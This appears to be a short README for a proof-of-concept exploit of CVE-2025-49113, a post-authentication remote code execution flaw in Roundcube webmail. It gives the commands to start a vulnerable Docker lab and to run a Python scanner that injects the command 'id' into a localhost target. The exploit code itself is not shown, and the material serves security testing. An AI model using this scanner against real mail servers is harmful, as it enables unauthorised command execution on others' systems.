
Post-authentication remote code execution proof-of-concept for CVE-2025-49113 in Roundcube webmail. Includes a vulnerable Docker environment and Python scanner for testing command injection.
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000